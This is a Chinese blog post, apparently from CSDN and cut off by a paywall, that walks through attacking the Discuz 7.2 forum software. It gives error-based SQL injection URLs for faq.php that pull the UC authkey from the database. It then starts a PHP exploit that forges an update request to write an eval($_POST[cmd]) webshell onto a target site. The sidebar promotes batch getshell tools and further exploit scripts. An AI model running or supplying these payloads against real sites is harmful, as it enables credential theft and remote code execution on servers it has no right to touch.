Dz7.2 从获取uc key到getshell

最新推荐文章于 2020-11-14 16:38:10 发布
VIP文章 最新推荐文章于 2020-11-14 16:38:10 发布
阅读量5.2k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h4ck0ne/article/details/50570708
版权

0x01
下午在群里看到的 问下朋友大概 然后用不生不熟的sqlmap在那跑

表能跑的出 列就GG 然后没辙

晚上跑各大论坛逛了遍果然大神多

就慢慢的研究下了下 看了pt0n大牛的分析文 真心感叹这洞 呵呵--

0x02
获取uc key

exp:

faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23

没完整取值只取了62

我们再取一次

exp:

  1. faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,63,60) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
 

 

那么获取到的uc key就是

d77978Sbq4b39bVccfK0J9B0K3x792ieH39dNbY8s8l79dB3z63fp2t563rdm6P4

shell里的对比下

 


0x03
利用uc key getshell

EXP

<?php

$timestamp = time()+10*3600;

$host="bbs.xxxxxx.com";

$uc_key="A1v8Z5Z7feZdmfcd72J5C5V8hc8dM4F6V2g0h5ofXdS6jcm1C78bZede39z51610";

$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));

$cmd1='<?xml version="1.0" encoding="ISO-8859-1"?>

<root>

<item id="UC_API">xxx\');eval($_POST[cmd]);//</item>

</root>';

$cmd2='<?xml version="1.0" encoding="ISO-8859-1"?>

<root>

<item id="UC_API">aaa</item>

</root>';

$html1 = send($cmd1);

最低0.47元/天 解锁文章
「已注销」
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
discuz-getshell-auto-method2:Discuz 全自动GetShell 方法#2
05-11
Discuz 全自动 GetShell 本方法比写 config_ucenter.php 更加稳定,而且不易出错 用法 打开 dzhack.php, 找到 $webshell = '<?php phpinfo(); ?>'; list ($status, $data) = $dz->hack ( 'http://ubuntu64/dz/', 'K856C548X2xaTcDdc248I1pc57gdq4vdL2SdH3ifGd4a0ec6UdcfX0B7m9Ubrcs4', ... ); 先把第一行 $webshell 的内容改了,不需要考虑编码问题, 然后修改 hack 函数的参数,第一个为 discuz 的起始路径,第二行为你找到的 UC_KEY 然后执行 php dzhack.php, 会在 data/client.php 下面生成一个 webshell, ![Sc
python discuz_Python写的Discuz7.2版faq.php注入漏洞工具
weixin_39638057的博客
11-23 95
Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者)实现代码:#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: gb2312 -*-# -*- coding: utf_8 -*-# author iswinimport sy...
天羽全自动getshell工具VIP版.zip
09-25
天羽全自动getshell工具VIP版,批量getshell工具,超级好用!!大家下载试试吧!!效果不错哦!!
Discuz利用UC_KEY进行前台getshell
aixuan9365的博客
06-02 966
来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137991.html 先通过uc_key把恶意代码保存在/uc_client/data/cache/badwords.php,然后利用preg_replace() 进行任意代码执行。 先附上来源中的脚本。修改了一些代码。 <?php $timestamp = ti...
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
dz7.2+UCenter.zip
10-15
dz7.2+UCenter,用于实验实验。Crossday Discuz! Board论坛系统(简称 Discuz!论坛)是一个采用PHP和MySQL/Pgsql等其他多种数据库构建的高效论坛解决方案。
DZ7.2论坛银行插件
07-23
怀旧论坛的插件之一,这个插件版权来自原作者。喜欢DZ7.2论坛程序的可以下载,已经很难找到这个插件了。
dz 所有版本后台GET SHELL1
08-08
dz 所有版本后台GET SHELL1
UC1.5_UCH2.0_DZ7.2_SC_UTF8
05-26
UC1.5_UCH2.0_DZ7.2_SC_UTF8
Getshell 网站漏洞批量检测工具破解后使用教程
07-26
Getshell网站漏洞批量检测工具破解后使用教程,运行软件,等待大概 3分钟左右软件才会启动。
收割机Getshell软件.zip
05-30
扫描后缀.txt,存放shell扫描用的后缀,自己可以添加更多后缀。 webshell.txt,存放扫描到的Webshell。 uploaddata/asp.txt,存放asp上传文件。 uploaddata/aspx.txt,存放aspx上传文件。 uploaddata/php.txt,存放php上传文件。 收割机.exe,主程序
墨客批量getshell
12-25
墨客传媒
批量getshell教程+工具
07-28
批量getshell教程+工具
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
Discuz Ml v3.x 前台Getshell姿势 Discuz漏洞
god_Zeo的安全博客
07-14 6047
Discuz Ml v3.x 前台Getshell姿势1.漏洞描述2.原理3.影响版本4.利用过程4.getshell POC请勿用于非法用途 1.漏洞描述 Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台,用于构建像“社交网络”这样的互联网社区。 2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的coo...
批量getshell工具全自动_【技巧1001-19】- 文件管理升级-全自动更新版
weixin_39564831的博客
11-14 345
今天我们分享办公实战技巧19,关于文件管理,前面我们是有介绍了一篇,方法也是比较简单方便,是否临时的文件管理,不管没有办法实现文件新增和删除以及添加子文件更的问题,所以有了今天这篇,全自动更新升级版文件管理,值得说的是非常简单​简单好用的文件管理:【技巧1001-4】-批量提取文件名并建立超链接可以筛选的文件管理:Excel版本动态可筛选的文件管理器文件通用管理模板(VBA):分享|文件管理模板以...
DZ拿shell总结
weixin_30600503的博客
01-23 761
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkeyshelluckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
Discuz的利用UC_KEY进行getshell
u013473481的专栏
01-14 1367
<?php // 代码版权归原作者所有! $timestamp = time()+10*3600; $host="127.0.0.1"; $uc_key="eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5Waofq6J285Ca33i151e551g0l9f2l3dd"; $code=urlencode(_authcode("time=$timest
dz 3.4 论坛自动获取标签
最新发布
08-04
dz 3.4 论坛自动获取标签是指在Discuz 3.4论坛系统中,为了提高用户在发帖时设置标签的便捷性和准确性,引入了一种自动获取标签的功能。这个功能可以根据用户所输入的帖子内容,自动从系统中预设的标签中进行匹配和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值